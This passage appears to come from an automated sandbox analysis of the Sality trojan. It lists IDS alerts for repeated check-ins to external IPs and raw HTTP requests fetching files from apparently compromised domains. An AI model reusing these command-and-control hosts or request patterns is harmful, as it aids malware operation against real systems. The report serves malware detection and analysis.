        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49862 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49864 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49865 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49866 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49867 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49868 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49870 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49871 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49872 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49873 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49874 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49876 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49877 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49878 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49879 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49880 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49882 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49883 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49884 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49885 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49886 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49888 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49889 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49890 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49891 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49892 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49894 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49895 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49896 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49897 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49898 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49900 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49901 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49902 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49903 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49904 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49906 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49907 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49908 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49909 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49910 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49912 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49913 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49914 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49915 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49916 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49918 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49919 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49920 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49921 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49922 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49924 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49925 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49926 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49927 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49928 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49930 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49931 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49932 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49933 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49934 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49936 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49937 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49938 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49939 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49940 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49942 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49943 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49944 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49945 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49946 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49948 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49949 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49950 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49951 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49952 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49954 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49955 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49956 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49957 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49958 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49960 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49961 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49962 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49963 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49964 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49966 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49967 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49968 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49969 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49970 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49972 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49973 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49974 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49975 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49976 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49978 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49979 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49980 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49981 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49982 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49984 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49985 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49986 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49987 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49988 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49990 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49991 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49992 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49993 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49994 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49996 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49997 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49998 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49999 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50000 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50002 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50003 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50004 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50005 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50006 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50008 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50009 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50010 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50011 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50012 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50014 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50015 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50016 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50017 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50018 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50020 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50021 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50022 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50023 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50024 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50026 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50027 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50028 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50029 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50030 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63852 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63853 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63854 -> 44.221.84.105:80
        Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 799
        Source: global traffic TCP traffic: 192.168.2.9:49706 -> 44.221.84.105:799
        Source: global traffic UDP traffic: 192.168.2.9:57606 -> 85.17.167.196:9832
        Source: Joe Sandbox View IP Address: 44.221.84.105
        Source: Joe Sandbox View IP Address: 78.46.2.155
        Source: Joe Sandbox View IP Address: 54.244.188.177
        Source: Joe Sandbox View ASN Name: AMAZON-AESUS
        Source: Joe Sandbox View ASN Name: HETZNER-ASDE
        Source: Joe Sandbox View ASN Name: AMAZON-02US
        Source: Joe Sandbox View ASN Name: AEROTEK-ASTR
        Source: global trafficHTTP traffic detected: GET /xs.jpg?263e0bf=360900279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27da790=167157312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2dce9fa=384258000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2f6b0f9=149164779 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?341e887=546510150 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?34f3b0d=388668763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?362c1e4=113607624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c84448=190368984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3dc8d75=518286248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e9e01a=262635624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?42142ff=692887030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?434c9e5=282273684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?475ad88=299284000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4ae2102=706685202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4c9a32f=401616875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?513542c=255458436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?59e2a88=565509936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?676dbbc=108452796 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6dcc621=690791622 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7591ee5=1109530125 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7ab8dec=1286835000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?811c5c4=406147404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
